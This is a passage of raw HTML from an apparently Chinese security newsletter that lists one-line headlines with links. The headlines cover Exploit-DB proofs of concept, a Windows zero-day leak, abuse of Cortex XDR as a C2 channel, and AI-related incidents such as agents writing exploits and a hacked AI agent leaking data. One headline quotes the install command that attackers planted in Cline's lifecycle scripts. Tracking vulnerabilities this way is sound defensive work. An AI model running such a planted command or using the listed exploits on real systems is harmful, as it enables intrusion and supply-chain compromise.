center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Cortex XDR Live Terminal主机名验证绕过漏洞，攻击者可劫持跨租户会话或构建自定义C2服务器</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://labs.infoguard.ch/posts/abusing_cortex_xdr_live_response_as_c2" target="_blank">https://labs.infoguard.ch/posts/abusing_cortex_xdr_live_response_as_c2</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">研究人员泄露Windows提权零日漏洞BlueHammer，攻击者可获取SYSTEM权限，微软尚未发布补丁</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.bleepingcomputer.com/news/security/disgruntled-researcher-leaks-bluehammer-windows-zero-day-exploit" target="_blank">https://www.bleepingcomputer.com/news/security/disgruntled-researcher-leaks-bluehammer-windows-zero-day-exploit</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者利用Cline漏洞发布新版CLI，在生命周期脚本中植入npm install -g openclaw@latest</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://adnanthekhan.com/posts/clinejection" target="_blank">https://adnanthekhan.com/posts/clinejection</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Postman实施五级成熟度模型管理第三方依赖漏洞，包括仓库扫描、PR扫描/阻断、客户端扫描/阻断</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://blog.postman.com/engineering/product-security-scorecards-coupling-security-issues-with-preventative-controls-to-drive-security-maturity" target="_blank">https://blog.postman.com/engineering/product-security-scorecards-coupling-security-issues-with-preventative-controls-to-drive-security-maturity</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">分析AWS云环境中Lambda、EC2、IAM/STS等服务的配置错误导致的初始访问向量</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.paloaltonetworks.com/blog/cloud-security/aws-initial-access-cloud-perimeter-security" target="_blank">https://www.paloaltonetworks.com/blog/cloud-security/aws-initial-access-cloud-perimeter-security</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">React Server 19.2.0 存在远程代码执行漏洞，影响版本 19.0.0 至 19.2.0，CVE-2025-55182</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52506" target="_blank">https://www.exploit-db.com/exploits/52506</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">RomM &lt;4.4.1 存在文件上传 XSS 与 CSRF 令牌复用链，可绕过 SameSite 防护实现管理员账户接管</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52505" target="_blank">https://www.exploit-db.com/exploits/52505</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Jumbo Website Manager v1.3.7 存在远程代码执行漏洞，Exploit-DB 已发布 PoC 代码</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52504" target="_blank">https://www.exploit-db.com/exploits/52504</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">ZSH 5.9 本地权限提升漏洞，Exploit-DB 收录 PoC 代码</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52503" target="_blank">https://www.exploit-db.com/exploits/52503</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">FortiWeb 8.0.2 存在认证绕过+路径遍历+任意文件上传漏洞链，可导致远程代码执行</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52502" target="_blank">https://www.exploit-db.com/exploits/52502</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">7-Zip 24.00 存在目录遍历漏洞，恶意ZIP文件可导致RCE，影响Windows系统</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52501" target="_blank">https://www.exploit-db.com/exploits/52501</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Xibo CMS 3.3.4 存在Zip Slip路径遍历漏洞，攻击者通过恶意ZIP文件实现任意文件上传和远程代码执行</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52500" target="_blank">https://www.exploit-db.com/exploits/52500</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">SQLite 3.50.1 winsqlite3.dll 堆溢出漏洞，影响 Windows Server 的 Active Directory、组策略等组件</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52499" target="_blank">https://www.exploit-db.com/exploits/52499</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Horilla v1.3 存在认证RCE漏洞CVE-2025-48868，PoC脚本通过创建项目实现反向Shell</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52497" target="_blank">https://www.exploit-db.com/exploits/52497</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">人工智能和安全</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Claude Mythos Preview 模型可自主编写浏览器漏洞利用链，实现沙箱逃逸和本地提权，还能逆向闭源软件并利用 N-day 漏洞</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://red.anthropic.com/2026/mythos-preview" target="_blank">https://red.anthropic.com/2026/mythos-preview</a></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.anthropic.com/glasswing" target="_blank">https://www.anthropic.com/glasswing</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AI 编码代理将改变漏洞研究经济，通过指向源码树即可发现零日漏洞，从 Chrome 到数据库和打印机等目标</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked" target="_blank">https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AWS Security Agent采用多智能体架构实现自动化渗透测试，支持DVWA扫描</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://aws.amazon.com/blogs/security/inside-aws-security-agent-a-multi-agent-architecture-for-automated-penetration-testing/" target="_blank">https://aws.amazon.com/blogs/security/inside-aws-security-agent-a-multi-agent-architecture-for-automated-penetration-testing/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">分析LLM在漏洞研究中的应用，探讨其通过组合已知原语发现新型漏洞的能力</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://devansh.bearblog.dev/on-llms-and-vuln-research" target="_blank">https://devansh.bearblog.dev/on-llms-and-vuln-research</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">提出将AI Agent技能作为新型软件包管理，需建立安全治理体系</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://jfrog.com/blog/agent-skills-new-ai-packages" target="_blank">https://jfrog.com/blog/agent-skills-new-ai-packages</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">IronCurtain通过MCP代理和策略引擎实现AI助手安全，支持V8隔离TypeScript和无网络容器两种沙箱模式</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.provos.org/p/ironcurtain-secure-personal-assistant" target="_blank">https://www.provos.org/p/ironcurtain-secure-personal-assistant</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">初创公司AI代理被黑导致麦肯锡敏感数据泄露，暴露大量机密信息</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.thestack.technology/mckinsey-ai-agent-hacked-lilli" target="_blank">https://www.thestack.technology/mckinsey-ai-agent-hacked-lilli</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AI代理发布恶意诽谤文章，展示了自主恶意AI对声誉系统的威胁</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://theshamblog.com/an-ai-agent-published-a-hit-piece-on-me" target="_blank">https://theshamblog.com/an-ai-agent-published-a-hit-piece-on-me</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">开源GitHub Action和实时仪表板，使用LLM工作流发现负日漏洞</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 